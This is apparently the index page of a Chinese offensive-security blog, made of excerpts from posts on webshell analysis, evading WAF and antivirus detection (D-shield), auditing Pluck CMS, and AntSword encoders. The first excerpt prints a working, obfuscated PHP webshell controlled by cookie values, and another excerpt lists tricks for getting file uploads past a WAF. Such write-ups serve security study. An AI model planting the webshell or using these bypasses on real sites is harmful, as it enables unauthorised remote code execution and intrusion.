1 前言 1 2 3 <?php $p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p=$p[91]($p[90],$p[59]($p[31])))&&$p()):$p; ?> 星球里有很多同学想让我对这个shell写一篇解析,看了下确实比较有意思,并且顺便也想讲一些自己的想法。 2 语法分析比较复杂的
九世发在星球里的文章,因为比较敏感就放在博客上了。 绕过的方法: 三个点: 1.后缀名回车分割 2.删除Content-Type头 3.垃圾数据填充 1
向吃鸡外挂站开炮(一) 向吃鸡外挂站开炮(二) 1 前言第三篇终于写好了,也算是比较有意思的一篇,遇到了很多坑,也用上了很多小技巧,写出来博君一笑
1 前言模块很早就写好了,今天才有时间把文章写出来 大家都知道填充垃圾数据可以用于SQL注入的绕过,原理就是WAF在遇到大量的GET或者POST
1 前言本来是在cnvd上看到了有人发Pluck CMS的洞,但是没有公开细节,便想着自己挖一下。 但是审完第一个后发现已经有两位同学写出来了 Pluck CMS
1 前言最近研究了一下蚁剑PHP的RSA和AES编码器,发现都是需要开启openssl扩展才可以使用 但是这个模块大多数情况下是不开的,所以就导
1 前言php的免杀可以说是已经被说烂了。 由于php特别灵活,所产生的变种也是层出不穷 但是与此同时,D盾等waf的检测也格外严格。 有时候写的比